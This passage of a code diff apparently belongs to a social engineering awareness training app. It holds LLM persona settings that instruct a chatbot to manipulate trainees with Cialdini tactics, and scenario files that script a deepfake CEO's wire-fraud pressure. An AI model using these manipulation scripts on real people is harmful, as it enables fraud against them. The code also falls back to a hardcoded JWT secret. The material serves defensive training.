and unexplored areas + all_categories = [ + "reciprocity", + "scarcity", + "authority", + "commitment", + "liking", + "social_proof", + ] + recommendations = [] + + for cat in all_categories: + if cat not in category_scores: + recommendations.append( + { + "category": cat, + "reason": "not_attempted", + "avg_score": 0, + } + ) + else: + avg = sum(category_scores[cat]) / len(category_scores[cat]) + if avg < 70: + recommendations.append( + { + "category": cat, + "reason": "needs_improvement", + "avg_score": round(avg, 1), + } + ) + + # Sort: not_attempted first, then lowest scores + recommendations.sort(key=lambda x: (x["reason"] != "not_attempted", x["avg_score"])) + + return recommendations[:3] + + +async def get_adaptive_persona_params(user_id: str) -> dict: + """Get adaptive parameters for AI chat persona based on user skill.""" + difficulty = await get_recommended_difficulty(user_id) + + params = { + "easy": { + "aggressiveness": 0.3, + "persistence": 2, + "technique_complexity": "basic", + "hints_enabled": True, + "instruction": ( + "Be somewhat obvious in your manipulation. " + "Use simple techniques. " + "Give the user clear red flags to catch." + ), + }, + "medium": { + "aggressiveness": 0.6, + "persistence": 4, + "technique_complexity": "intermediate", + "hints_enabled": False, + "instruction": ( + "Use moderately sophisticated manipulation. Mix techniques. Don't be too obvious." + ), + }, + "hard": { + "aggressiveness": 0.9, + "persistence": 6, + "technique_complexity": "advanced", + "hints_enabled": False, + "instruction": ( + "Use highly sophisticated, multi-layered " + "manipulation. Combine Cialdini principles. " + "Be very convincing and persistent. " + "Adapt your approach when resisted." 
+ ), + }, + } + + return { + "recommended_difficulty": difficulty, + "params": params.get(difficulty, params["medium"]), + } diff --git a/backend/services/auth.py b/backend/services/auth.py new file mode 100644 index 0000000..3e664be --- /dev/null +++ b/backend/services/auth.py @@ -0,0 +1,51 @@ +import os +from datetime import UTC, datetime, timedelta + +import bcrypt +import jwt +from fastapi import Depends, HTTPException +from fastapi.security import HTTPAuthorizationCredentials, HTTPBearer + +from models.schemas import User +from services.database import db + +JWT_SECRET = os.environ.get("JWT_SECRET", "soceng-lab-secret-key-change-in-production") +JWT_ALGORITHM = "HS256" +JWT_EXPIRATION_HOURS = 24 + +security = HTTPBearer() + + +def hash_password(password: str) -> str: + return bcrypt.hashpw(password.encode("utf-8"), bcrypt.gensalt()).decode("utf-8") + + +def verify_password(password: str, password_hash: str) -> bool: + return bcrypt.checkpw(password.encode("utf-8"), password_hash.encode("utf-8")) + + +def create_token(user_id: str) -> str: + expiration = datetime.now(UTC) + timedelta(hours=JWT_EXPIRATION_HOURS) + payload = {"user_id": user_id, "exp": expiration} + return jwt.encode(payload, JWT_SECRET, algorithm=JWT_ALGORITHM) + + +async def get_current_user( + credentials: HTTPAuthorizationCredentials = Depends(security), +) -> User: + try: + token = credentials.credentials + payload = jwt.decode(token, JWT_SECRET, algorithms=[JWT_ALGORITHM]) + user_id = payload.get("user_id") + + user_doc = await db.users.find_one({"id": user_id}, {"_id": 0}) + if not user_doc: + raise HTTPException(status_code=401, detail="User not found") + + return User(**user_doc) + except jwt.ExpiredSignatureError: + raise HTTPException(status_code=401, detail="Token expired") + except HTTPException: + raise + except Exception: + raise HTTPException(status_code=401, detail="Invalid token") diff --git a/backend/services/database.py b/backend/services/database.py new file mode 100644 index 
0000000..185f893 --- /dev/null +++ b/backend/services/database.py @@ -0,0 +1,10 @@ +import os + +from dotenv import load_dotenv +from motor.motor_asyncio import AsyncIOMotorClient + +load_dotenv() + +mongo_url = os.environ["MONGO_URL"] +client = AsyncIOMotorClient(mongo_url) +db = client[os.environ["DB_NAME"]] diff --git a/backend/services/gamification.py b/backend/services/gamification.py new file mode 100644 index 0000000..4d83ecd --- /dev/null +++ b/backend/services/gamification.py @@ -0,0 +1,276 @@ +import logging +from datetime import UTC, datetime + +from services.database import db + +logger = logging.getLogger(__name__) + +# XP thresholds per level +LEVEL_THRESHOLDS = [0, 100, 300, 600, 1000, 1500, 2200, 3000, 4000, 5500, 7500, 10000] + +# Badge definitions +BADGE_DEFINITIONS = [ + { + "id": "first_blood", + "name": "First Blood", + "description": "Complete your first simulation", + "icon": "Sword", + "condition": "complete_1_simulation", + "xp_reward": 50, + }, + { + "id": "phishing_detector", + "name": "Phishing Detector", + "description": "Score 80%+ on 3 phishing scenarios", + "icon": "Shield", + "condition": "phishing_score_80_x3", + "xp_reward": 100, + }, + { + "id": "social_proof_immune", + "name": "Social Proof Immune", + "description": "Resist all social proof attacks", + "icon": "Users", + "condition": "resist_social_proof_x3", + "xp_reward": 100, + }, + { + "id": "authority_challenger", + "name": "Authority Challenger", + "description": "Score 90%+ on authority-based attacks", + "icon": "Crown", + "condition": "authority_score_90", + "xp_reward": 150, + }, + { + "id": "streak_3", + "name": "On Fire", + "description": "Maintain a 3-day streak", + "icon": "Flame", + "condition": "streak_3", + "xp_reward": 75, + }, + { + "id": "streak_7", + "name": "Unstoppable", + "description": "Maintain a 7-day streak", + "icon": "Zap", + "condition": "streak_7", + "xp_reward": 150, + }, + { + "id": "streak_30", + "name": "Iron Will", + "description": "Maintain a 
30-day streak", + "icon": "Trophy", + "condition": "streak_30", + "xp_reward": 500, + }, + { + "id": "quiz_master", + "name": "Quiz Master", + "description": "Score 100% on 5 quizzes", + "icon": "BookCheck", + "condition": "quiz_perfect_x5", + "xp_reward": 200, + }, + { + "id": "all_categories", + "name": "Cialdini Scholar", + "description": "Complete scenarios in all 6 categories", + "icon": "Brain", + "condition": "all_cialdini_categories", + "xp_reward": 300, + }, + { + "id": "campaign_hero", + "name": "Campaign Hero", + "description": "Complete a campaign with 80%+ avg score", + "icon": "Flag", + "condition": "campaign_complete_80", + "xp_reward": 250, + }, + { + "id": "team_player", + "name": "Team Player", + "description": "Join an organization", + "icon": "Users2", + "condition": "join_organization", + "xp_reward": 50, + }, + { + "id": "scenario_creator", + "name": "Scenario Creator", + "description": "Publish a custom scenario", + "icon": "Pencil", + "condition": "publish_scenario", + "xp_reward": 200, + }, +] + + +def calculate_level(xp: int) -> int: + """Calculate level from XP.""" + for i in range(len(LEVEL_THRESHOLDS) - 1, -1, -1): + if xp >= LEVEL_THRESHOLDS[i]: + return i + 1 + return 1 + + +def xp_for_next_level(current_xp: int) -> dict: + """Get XP progress to next level.""" + level = calculate_level(current_xp) + if level >= len(LEVEL_THRESHOLDS): + return {"current": current_xp, "next_level_xp": current_xp, "progress": 100} + + current_threshold = LEVEL_THRESHOLDS[level - 1] + next_threshold = LEVEL_THRESHOLDS[level] if level < len(LEVEL_THRESHOLDS) else current_xp + progress = ((current_xp - current_threshold) / (next_threshold - current_threshold)) * 100 + + return { + "current_xp": current_xp, + "level": level, + "current_threshold": current_threshold, + "next_threshold": next_threshold, + "progress": round(min(progress, 100), 1), + } + + +async def award_xp(user_id: str, xp_amount: int, check_streak: bool = False) -> dict: + """Award XP to 
user and check for level ups and badges.""" + user = await db.users.find_one({"id": user_id}, {"_id": 0}) + if not user: + return {} + + now = datetime.now(UTC) + updates = {} + new_badges = [] + + # Streak logic + if check_streak: + last_active = user.get("last_active") + streak = user.get("streak_days", 0) + + if last_active: + if isinstance(last_active, str): + last_active = datetime.fromisoformat(last_active.replace("Z", "+00:00")) + days_diff = (now.date() - last_active.date()).days + + if days_diff == 1: + streak += 1 + elif days_diff > 1: + streak = 1 + # Same day = no change + else: + streak = 1 + + updates["streak_days"] = streak + updates["last_active"] = now.isoformat() + + # Streak badges + if streak >= 3 and "streak_3" not in user.get("badges", []): + new_badges.append("streak_3") + xp_amount += 75 + if streak >= 7 and "streak_7" not in user.get("badges", []): + new_badges.append("streak_7") + xp_amount += 150 + if streak >= 30 and "streak_30" not in user.get("badges", []): + new_badges.append("streak_30") + xp_amount += 500 + + # Update XP + new_xp = user.get("xp", 0) + xp_amount + new_level = calculate_level(new_xp) + updates["xp"] = new_xp + updates["level"] = new_level + + # Apply badge updates + if new_badges: + await db.users.update_one( + {"id": user_id}, + {"$addToSet": {"badges": {"$each": new_badges}}}, + ) + + await db.users.update_one({"id": user_id}, {"$set": updates}) + + # Create notifications for new badges + for badge_id in new_badges: + badge_def = next((b for b in BADGE_DEFINITIONS if b["id"] == badge_id), None) + if badge_def: + await db.notifications.insert_one( + { + "id": str(__import__("uuid").uuid4()), + "user_id": user_id, + "title": f"Badge Earned: {badge_def['name']}", + "message": badge_def["description"], + "type": "achievement", + "read": False, + "created_at": now.isoformat(), + } + ) + + leveled_up = new_level > user.get("level", 1) + if leveled_up: + await db.notifications.insert_one( + { + "id": 
str(__import__("uuid").uuid4()), + "user_id": user_id, + "title": f"Level Up! You're now Level {new_level}", + "message": f"Keep training to reach Level {new_level + 1}!", + "type": "achievement", + "read": False, + "created_at": now.isoformat(), + } + ) + + return { + "xp_earned": xp_amount, + "total_xp": new_xp, + "level": new_level, + "leveled_up": leveled_up, + "new_badges": new_badges, + } + + +async def check_simulation_badges(user_id: str): + """Check and award badges based on simulation history.""" + user = await db.users.find_one({"id": user_id}, {"_id": 0}) + if not user: + return + + existing_badges = user.get("badges", []) + sims = await db.simulations.find( + {"user_id": user_id, "status": "completed"}, {"_id": 0} + ).to_list(1000) + + new_badges = [] + total_xp = 0 + + # First Blood + if "first_blood" not in existing_badges and len(sims) >= 1: + new_badges.append("first_blood") + total_xp += 50 + + # Quiz Master: 5 perfect quiz scores + quiz_sims = [s for s in sims if s.get("simulation_type") == "quiz" and s.get("score", 0) == 100] + if "quiz_master" not in existing_badges and len(quiz_sims) >= 5: + new_badges.append("quiz_master") + total_xp += 200 + + # All Cialdini categories + all_categories = set() + for s in sims: + cats = s.get("challenge_data", {}).get("cialdini_categories", []) + all_categories.update(cats) + cialdini_6 = {"reciprocity", "scarcity", "authority", "commitment", "liking", "social_proof"} + if "all_categories" not in existing_badges and cialdini_6.issubset(all_categories): + new_badges.append("all_categories") + total_xp += 300 + + if new_badges: + await db.users.update_one( + {"id": user_id}, + {"$addToSet": {"badges": {"$each": new_badges}}}, + ) + if total_xp > 0: + await award_xp(user_id, total_xp) diff --git a/backend/services/llm.py b/backend/services/llm.py new file mode 100644 index 0000000..dce4f43 --- /dev/null +++ b/backend/services/llm.py @@ -0,0 +1,354 @@ +import asyncio +import json +import logging +import re +from 
typing import Any + +from langchain_core.messages import HumanMessage, SystemMessage + +logger = logging.getLogger(__name__) + +# ==================== MODEL CATALOG ==================== +# Provider -> list of { id, name, context, free? } + +PROVIDER_MODELS = { + "groq": [ + {"id": "llama-3.3-70b-versatile", "name": "Llama 3.3 70B", "context": 128000}, + {"id": "llama-3.1-8b-instant", "name": "Llama 3.1 8B Instant", "context": 128000}, + {"id": "llama3-70b-8192", "name": "Llama 3 70B", "context": 8192}, + {"id": "llama3-8b-8192", "name": "Llama 3 8B", "context": 8192}, + {"id": "gemma2-9b-it", "name": "Gemma 2 9B", "context": 8192}, + {"id": "mixtral-8x7b-32768", "name": "Mixtral 8x7B", "context": 32768}, + ], + "gemini": [ + {"id": "gemini-2.0-flash", "name": "Gemini 2.0 Flash", "context": 1000000}, + {"id": "gemini-1.5-flash", "name": "Gemini 1.5 Flash", "context": 1000000}, + {"id": "gemini-1.5-pro", "name": "Gemini 1.5 Pro", "context": 2000000}, + {"id": "gemini-pro", "name": "Gemini Pro (Legacy)", "context": 32000}, + ], + "claude": [ + {"id": "claude-sonnet-4-20250514", "name": "Claude Sonnet 4", "context": 200000}, + {"id": "claude-3-5-sonnet-20241022", "name": "Claude 3.5 Sonnet", "context": 200000}, + {"id": "claude-3-5-haiku-20241022", "name": "Claude 3.5 Haiku", "context": 200000}, + {"id": "claude-3-haiku-20240307", "name": "Claude 3 Haiku", "context": 200000}, + ], + "openai": [ + {"id": "gpt-4o", "name": "GPT-4o", "context": 128000}, + {"id": "gpt-4o-mini", "name": "GPT-4o Mini", "context": 128000}, + {"id": "gpt-4-turbo", "name": "GPT-4 Turbo", "context": 128000}, + {"id": "gpt-3.5-turbo", "name": "GPT-3.5 Turbo", "context": 16385}, + ], + "openrouter": [ + { + "id": "meta-llama/llama-3.3-70b-instruct", + "name": "Llama 3.3 70B Instruct", + "context": 128000, + }, + { + "id": "meta-llama/llama-3.1-405b-instruct", + "name": "Llama 3.1 405B Instruct", + "context": 128000, + }, + { + "id": "meta-llama/llama-3.1-8b-instruct:free", + "name": "Llama 3.1 8B 
(Free)", + "context": 128000, + "free": True, + }, + { + "id": "google/gemini-2.0-flash-exp:free", + "name": "Gemini 2.0 Flash (Free)", + "context": 1000000, + "free": True, + }, + {"id": "google/gemini-pro-1.5", "name": "Gemini Pro 1.5", "context": 2000000}, + {"id": "anthropic/claude-3.5-sonnet", "name": "Claude 3.5 Sonnet", "context": 200000}, + {"id": "anthropic/claude-3.5-haiku", "name": "Claude 3.5 Haiku", "context": 200000}, + {"id": "openai/gpt-4o", "name": "GPT-4o", "context": 128000}, + {"id": "openai/gpt-4o-mini", "name": "GPT-4o Mini", "context": 128000}, + {"id": "mistralai/mistral-large-latest", "name": "Mistral Large", "context": 128000}, + {"id": "mistralai/mixtral-8x22b-instruct", "name": "Mixtral 8x22B", "context": 65536}, + {"id": "qwen/qwen-2.5-72b-instruct", "name": "Qwen 2.5 72B", "context": 128000}, + {"id": "deepseek/deepseek-chat", "name": "DeepSeek V3", "context": 128000}, + {"id": "deepseek/deepseek-r1", "name": "DeepSeek R1", "context": 64000}, + {"id": "nousresearch/hermes-3-llama-3.1-405b", "name": "Hermes 3 405B", "context": 128000}, + { + "id": "microsoft/phi-3-medium-128k-instruct", + "name": "Phi 3 Medium 128K", + "context": 128000, + }, + ], + "local": [ + {"id": "custom", "name": "Custom Model (enter below)", "context": 0}, + ], +} + +MODEL_DEFAULTS = { + "groq": "llama-3.3-70b-versatile", + "gemini": "gemini-2.0-flash", + "claude": "claude-3-5-sonnet-20241022", + "openai": "gpt-4o-mini", + "openrouter": "meta-llama/llama-3.1-8b-instruct:free", + "local": "llama3", +} + +GEMINI_FALLBACK_MODELS = [ + "gemini-2.0-flash", + "gemini-1.5-flash", + "models/gemini-1.5-flash", + "gemini-pro", +] + +# OpenRouter base URL +OPENROUTER_BASE_URL = "https://openrouter.ai/api/v1" + +# Default local endpoints +LOCAL_DEFAULTS = { + "ollama": "http://localhost:11434/v1", + "lm_studio": "http://localhost:1234/v1", + "llamacpp": "http://localhost:8080/v1", +} + + +def sanitize_llm_output(text: str) -> str: + """Remove markdown code blocks and 
training markers from LLM output.""" + text = re.sub(r"```(?:json)?", "", text) + text = text.replace("```", "") + text = text.replace("[TRAINING]", "").replace("[TRAINING MATERIAL]", "") + return text.strip() + + +def repair_json(text: str) -> str: + """Attempt to repair and extract valid JSON from LLM output.""" + text = sanitize_llm_output(text) + + start = text.find("{") + end = text.rfind("}") + + if start != -1 and end != -1: + text = text[start : end + 1] + + try: + json.loads(text) + return text + except json.JSONDecodeError: + pass + + return text + + +def get_provider_models(provider: str) -> list: + """Return the model catalog for a given provider.""" + return PROVIDER_MODELS.get(provider, []) + + +# ==================== PROVIDER INVOCATIONS ==================== + + +async def _invoke_openai_compatible( + api_key: str, + model_name: str, + messages: list, + base_url: str = None, + temperature: float = 0.7, + extra_headers: dict = None, +): + """Generic OpenAI-compatible invocation (works for OpenAI, OpenRouter, Local LLMs).""" + from langchain_openai import ChatOpenAI + + kwargs = { + "api_key": api_key or "not-needed", + "model": model_name, + "temperature": temperature, + } + if base_url: + kwargs["base_url"] = base_url + if extra_headers: + kwargs["default_headers"] = extra_headers + + chat = ChatOpenAI(**kwargs) + return await asyncio.wait_for(chat.ainvoke(messages), timeout=30.0) + + +async def _invoke_gemini(api_key: str, model_name: str, messages: list, temperature: float = 0.7): + """Invoke Gemini with fallback model strategy.""" + from langchain_google_genai import ChatGoogleGenerativeAI + + model_candidates = [model_name] + GEMINI_FALLBACK_MODELS + model_candidates = list(dict.fromkeys(model_candidates)) + + last_error = None + for candidate in model_candidates: + try: + logger.info(f"Attempting Gemini with model: {candidate}") + convert_system = "1.5" not in candidate and "2.0" not in candidate + chat = ChatGoogleGenerativeAI( + 
google_api_key=api_key, + model=candidate, + temperature=temperature, + convert_system_message_to_human=convert_system, + ) + response = await asyncio.wait_for(chat.ainvoke(messages), timeout=15.0) + if response: + logger.info(f"Success with model: {candidate}") + return response + except TimeoutError: + logger.warning(f"Timeout with model {candidate}") + last_error = Exception(f"Request timed out for {candidate}") + except Exception as e: + logger.warning(f"Failed with model {candidate}: {e}") + last_error = e + + raise last_error or Exception("All Gemini models failed") + + +async def _invoke_provider(config: dict[str, Any], messages: list, temperature: float = 0.7): + """Route to the correct provider invocation.""" + provider = config["provider"] + api_key = config.get("api_key", "") + model_name = config.get("model_name") or MODEL_DEFAULTS.get(provider) + base_url = config.get("base_url") + + if provider == "groq": + from langchain_groq import ChatGroq + + chat = ChatGroq(api_key=api_key, model_name=model_name, temperature=temperature) + return await asyncio.wait_for(chat.ainvoke(messages), timeout=15.0) + + elif provider == "gemini": + return await _invoke_gemini(api_key, model_name, messages, temperature) + + elif provider == "claude": + from langchain_anthropic import ChatAnthropic + + chat = ChatAnthropic(api_key=api_key, model=model_name, temperature=temperature) + return await asyncio.wait_for(chat.ainvoke(messages), timeout=30.0) + + elif provider == "openai": + return await _invoke_openai_compatible( + api_key, + model_name, + messages, + temperature=temperature, + ) + + elif provider == "openrouter": + return await _invoke_openai_compatible( + api_key=api_key, + model_name=model_name, + messages=messages, + base_url=OPENROUTER_BASE_URL, + temperature=temperature, + extra_headers={ + "HTTP-Referer": "https://github.com/fdciabdul/Pretexta", + "X-Title": "Pretexta", + }, + ) + + elif provider == "local": + # Local LLM: Ollama, LM Studio, llama.cpp, etc. 
+ endpoint = base_url or LOCAL_DEFAULTS["ollama"] + return await _invoke_openai_compatible( + api_key=api_key or "not-needed", + model_name=model_name or "llama3", + messages=messages, + base_url=endpoint, + temperature=temperature, + ) + + else: + raise ValueError(f"Unsupported provider: {provider}") + + +# ==================== PUBLIC API ==================== + + +async def get_llm_generate_model(config: dict[str, Any], prompt: str, context: dict[str, Any]): + """Generate pretext content using configured LLM provider.""" + context_str = json.dumps(context, indent=2) if isinstance(context, dict) else str(context) + system_message = SystemMessage( + content=( + "You are a social engineering pretext generator. Generate realistic, " + "ethically-sound pretexts for security awareness training. Always mark " + "outputs as training material.\n\nContext: " + context_str + "\n\n" + ) + ) + user_message = HumanMessage(content=prompt) + messages = [system_message, user_message] + + return await _invoke_provider(config, messages) + + +async def get_llm_chat_model(config: dict[str, Any], messages: list): + """Chat interaction using configured LLM provider.""" + return await _invoke_provider(config, messages, temperature=0.8) + + +async def fetch_local_models(base_url: str) -> list: + """Fetch available models from a local Ollama/LM Studio instance.""" + import httpx + + # Try Ollama API format + try: + async with httpx.AsyncClient(timeout=5) as client: + # Ollama native API + response = await client.get(f"{base_url.rstrip('/v1').rstrip('/')}/api/tags") + if response.status_code == 200: + data = response.json() + return [ + {"id": m["name"], "name": m["name"], "context": 0, "local": True} + for m in data.get("models", []) + ] + except Exception: + pass + + # Try OpenAI-compatible /models endpoint + try: + async with httpx.AsyncClient(timeout=5) as client: + response = await client.get(f"{base_url.rstrip('/')}/models") + if response.status_code == 200: + data = response.json() + 
return [ + {"id": m["id"], "name": m.get("id", "unknown"), "context": 0, "local": True} + for m in data.get("data", []) + ] + except Exception: + pass + + return [] + + +async def fetch_openrouter_models(api_key: str) -> list: + """Fetch available models from OpenRouter API.""" + import httpx + + try: + async with httpx.AsyncClient(timeout=10) as client: + response = await client.get( + "https://openrouter.ai/api/v1/models", + headers={"Authorization": f"Bearer {api_key}"} if api_key else {}, + ) + if response.status_code == 200: + data = response.json() + models = [] + for m in data.get("data", []): + models.append( + { + "id": m["id"], + "name": m.get("name", m["id"]), + "context": m.get("context_length", 0), + "pricing": m.get("pricing", {}), + } + ) + # Sort: free models first, then by name + models.sort( + key=lambda x: ( + not (x.get("pricing", {}).get("prompt", "1") == "0"), + x["name"], + ) + ) + return models + except Exception as e: + logger.warning(f"Failed to fetch OpenRouter models: {e}") + + return [] diff --git a/backend/services/scoring.py b/backend/services/scoring.py new file mode 100644 index 0000000..de1f3dc --- /dev/null +++ b/backend/services/scoring.py @@ -0,0 +1,24 @@ +from typing import Any + + +def calculate_susceptibility_score(simulation: dict[str, Any]) -> dict[str, Any]: + """Calculate susceptibility score 0-100. 
Lower = more susceptible.""" + events = simulation.get("events", []) + + if not events: + return {"total": 0, "breakdown": {}} + + compliance_count = sum(1 for e in events if e.get("action") == "complied") + total_events = len(events) + + base_score = max(0, 100 - (compliance_count / total_events * 100)) if total_events > 0 else 50 + + return { + "total": round(base_score, 2), + "breakdown": { + "compliance_rate": round( + (compliance_count / total_events * 100) if total_events > 0 else 0, 2 + ), + "total_events": total_events, + }, + } diff --git a/data/sample/2025-01-12-deepfake-video-call.yaml b/data/sample/2025-01-12-deepfake-video-call.yaml new file mode 100644 index 0000000..f477754 --- /dev/null +++ b/data/sample/2025-01-12-deepfake-video-call.yaml @@ -0,0 +1,162 @@ +type: challenge +title: "Deepfake CEO Video Call" +description: "Your CEO joins an evening video call about a confidential acquisition. But something feels off." +difficulty: hard +cialdini_categories: + - authority + - urgency + - commitment +estimated_time: 15 +metadata: + author: "Pretexta" + tags: [deepfake, video-call, bec, wire-fraud, ai-attack] + +nodes: + - id: start + type: message + channel: chat + content_en: + from: "CEO (Video Call)" + body: "Hey, glad I caught you online. Remember that acquisition we discussed at the board meeting? It's accelerating. I need you to authorize a wire transfer before midnight. The lawyers are waiting." + content_id: + from: "CEO (Video Call)" + body: "Hei, senang bisa ketemu kamu online. Ingat akuisisi yang kita bahas di rapat direksi? Prosesnya dipercepat. Saya butuh kamu otorisasi transfer wire sebelum tengah malam. Tim legal sudah menunggu." + next: choice_1 + + - id: choice_1 + type: question + content_en: + text: "The CEO looks and sounds real on video, but the request is unusual. What do you do?" + content_id: + text: "CEO terlihat dan terdengar nyata di video, tapi permintaannya tidak biasa. Apa yang kamu lakukan?" 
+ options: + - text: "Process the transfer โ€” the CEO asked directly on video" + text_id: "Proses transfer โ€” CEO langsung meminta via video" + next: bad_outcome_immediate + score_impact: -50 + - text: "Ask the CEO a personal question only the real CEO would know" + text_id: "Ajukan pertanyaan pribadi yang hanya CEO asli yang tahu" + next: verify_identity + score_impact: 15 + - text: "Say you'll handle it, but first verify through the CEO's executive assistant via a separate channel" + text_id: "Bilang akan diurus, tapi verifikasi dulu lewat asisten eksekutif CEO via channel terpisah" + next: good_outcome_oob + score_impact: 30 + + - id: verify_identity + type: message + channel: chat + content_en: + from: "CEO (Video Call)" + body: "Come on, you're really going to quiz me? *laughs* Fine... look, the connection is getting bad. I have to jump to another call with the lawyers in Frankfurt in 3 minutes. Can you just process this? I'll send you formal confirmation tomorrow morning." + content_id: + from: "CEO (Video Call)" + body: "Ayolah, kamu mau mengkuis saya? *tertawa* Baik... lihat, koneksinya mulai jelek. Saya harus masuk call lain dengan pengacara di Frankfurt 3 menit lagi. Bisa langsung proses? Saya kirim konfirmasi formal besok pagi." + next: choice_2 + + - id: choice_2 + type: question + content_en: + text: "The CEO evaded your verification question and is pressuring you with time constraints. The video quality seems to be deteriorating. What now?" + content_id: + text: "CEO menghindari pertanyaan verifikasi dan menekan dengan batasan waktu. Kualitas video tampak menurun. Sekarang apa?" 
+ options: + - text: "Process the transfer โ€” you don't want to upset the CEO" + text_id: "Proses transfer โ€” kamu tidak mau membuat CEO marah" + next: bad_outcome_pressured + score_impact: -40 + - text: "Insist on verification: 'I understand it's urgent, but policy requires dual authorization for transfers over $10K'" + text_id: "Tetap minta verifikasi: 'Saya paham ini urgent, tapi kebijakan memerlukan otorisasi ganda untuk transfer di atas $10K'" + next: escalation + score_impact: 20 + - text: "End the call and immediately contact the CEO through their known personal phone number" + text_id: "Akhiri panggilan dan langsung hubungi CEO melalui nomor telepon pribadi yang sudah dikenal" + next: good_outcome_verify + score_impact: 40 + + - id: escalation + type: message + channel: chat + content_en: + from: "CEO (Video Call)" + body: "Dual authorization? For crying out loud... this is a CONFIDENTIAL deal. The fewer people who know, the better. Are you going to be the one who killed this deal because of paperwork? I'm deeply disappointed. This will be noted." + content_id: + from: "CEO (Video Call)" + body: "Otorisasi ganda? Ya ampun... ini RAHASIA. Semakin sedikit yang tahu, semakin baik. Kamu mau jadi orang yang menghancurkan deal ini karena birokrasi? Saya sangat kecewa. Ini akan dicatat." + next: choice_3 + + - id: choice_3 + type: question + content_en: + text: "The CEO is now threatening your career. The pressure is intense. But deepfakes can replicate facial expressions and voice patterns. What's your final decision?" + content_id: + text: "CEO sekarang mengancam karirmu. Tekanannya intens. Tapi deepfake bisa mereplikasi ekspresi wajah dan pola suara. Apa keputusan akhirmu?" + options: + - text: "Give in and process the transfer to save your career" + text_id: "Menyerah dan proses transfer untuk menyelamatkan karir" + next: bad_outcome_career_threat + score_impact: -100 + - text: "Stand firm: 'I'm following protocol. 
If you're really the CEO, you'd appreciate that I'm protecting company assets.'" + text_id: "Tetap teguh: 'Saya mengikuti prosedur. Jika Anda benar-benar CEO, Anda akan menghargai bahwa saya melindungi aset perusahaan.'" + next: good_outcome_stood_firm + score_impact: 50 + + - id: bad_outcome_immediate + type: end + result: failure + content_en: + title: "Compromised โ€” Deepfake Successful" + explanation: "You authorized a wire transfer based solely on a video call. The 'CEO' was an AI-generated deepfake. Modern deepfake technology can recreate realistic video and voice in real-time. Always verify large financial requests through independent, out-of-band channels โ€” never trust video alone." + content_id: + title: "Terkompromi โ€” Deepfake Berhasil" + explanation: "Kamu mengotorisasi transfer wire hanya berdasarkan video call. 'CEO' tersebut adalah deepfake buatan AI. Teknologi deepfake modern bisa membuat video dan suara realistis secara real-time. Selalu verifikasi permintaan finansial besar melalui channel independen โ€” jangan pernah percaya video saja." + + - id: bad_outcome_pressured + type: end + result: failure + content_en: + title: "Compromised โ€” Pressure Tactics Worked" + explanation: "Despite initial suspicion, you gave in to time pressure. The deepfake evaded your verification attempt by creating artificial urgency. Key lesson: if someone avoids verification AND creates urgency, that's a double red flag." + content_id: + title: "Terkompromi โ€” Taktik Tekanan Berhasil" + explanation: "Meskipun awalnya curiga, kamu menyerah pada tekanan waktu. Deepfake menghindari upaya verifikasi dengan menciptakan urgensi buatan. Pelajaran: jika seseorang menghindari verifikasi DAN menciptakan urgensi, itu adalah dua tanda bahaya." 
+ + - id: bad_outcome_career_threat + type: end + result: failure + content_en: + title: "Compromised โ€” Career Threat Effective" + explanation: "The attacker used escalating emotional pressure: urgency โ†’ authority โ†’ career threats. This is a classic manipulation cascade. A real CEO who values security would NEVER threaten an employee for following security protocols. The threat itself was the biggest red flag." + content_id: + title: "Terkompromi โ€” Ancaman Karir Efektif" + explanation: "Penyerang menggunakan tekanan emosional bertingkat: urgensi โ†’ otoritas โ†’ ancaman karir. Ini adalah kaskade manipulasi klasik. CEO asli yang menghargai keamanan TIDAK AKAN pernah mengancam karyawan karena mengikuti protokol keamanan. Ancaman itu sendiri adalah tanda bahaya terbesar." + + - id: good_outcome_oob + type: end + result: success + content_en: + title: "Defended โ€” Out-of-Band Verification" + explanation: "Excellent! You recognized that even video calls can be faked and chose to verify through a completely separate channel. The executive assistant confirmed the CEO was on vacation โ€” no acquisition was in progress. This is the gold standard response to suspicious executive requests." + content_id: + title: "Berhasil Bertahan โ€” Verifikasi Out-of-Band" + explanation: "Luar biasa! Kamu menyadari bahwa bahkan video call bisa dipalsukan dan memilih verifikasi melalui channel yang sepenuhnya terpisah. Asisten eksekutif mengonfirmasi CEO sedang liburan โ€” tidak ada akuisisi yang berlangsung. Ini adalah respons standar emas untuk permintaan eksekutif mencurigakan." + + - id: good_outcome_verify + type: end + result: success + content_en: + title: "Defended โ€” Direct Verification" + explanation: "Smart move. You ended the suspicious call and contacted the CEO through a known, trusted channel. The real CEO confirmed they never made that call. You successfully identified a deepfake attack. Always verify through channels YOU initiate, not ones provided by the caller." 
+ content_id: + title: "Berhasil Bertahan โ€” Verifikasi Langsung" + explanation: "Langkah cerdas. Kamu mengakhiri panggilan mencurigakan dan menghubungi CEO melalui channel yang dikenal dan terpercaya. CEO asli mengonfirmasi tidak pernah melakukan panggilan itu. Kamu berhasil mengidentifikasi serangan deepfake. Selalu verifikasi melalui channel yang KAMU inisiasi." + + - id: good_outcome_stood_firm + type: end + result: success + content_en: + title: "Defended โ€” Unbreakable Protocol" + explanation: "Outstanding resilience. You withstood three levels of social engineering: urgency, authority, and career threats. Your response was textbook perfect โ€” a legitimate executive would NEVER punish an employee for following security protocols. The deepfake revealed itself through its aggressive response to verification." + content_id: + title: "Berhasil Bertahan โ€” Protokol Tak Tergoyahkan" + explanation: "Ketahanan luar biasa. Kamu bertahan dari tiga level social engineering: urgensi, otoritas, dan ancaman karir. Respons kamu sempurna โ€” eksekutif yang sah TIDAK AKAN pernah menghukum karyawan karena mengikuti protokol keamanan. Deepfake mengungkap dirinya melalui respons agresif terhadap verifikasi." diff --git a/data/sample/2025-01-13-mfa-fatigue.yaml b/data/sample/2025-01-13-mfa-fatigue.yaml new file mode 100644 index 0000000..c65bc2d --- /dev/null +++ b/data/sample/2025-01-13-mfa-fatigue.yaml @@ -0,0 +1,148 @@ +type: challenge +title: "MFA Fatigue Attack" +description: "Your phone won't stop buzzing with login approval requests. Then 'IT Security' calls." +difficulty: hard +cialdini_categories: + - authority + - urgency + - social_proof +estimated_time: 12 +metadata: + author: "Pretexta" + tags: [mfa, account-takeover, push-notification, fatigue-attack] + +nodes: + - id: start + type: message + channel: narrator + content_en: + text: "It's 11:30 PM. Your phone buzzes. And again. And again. 
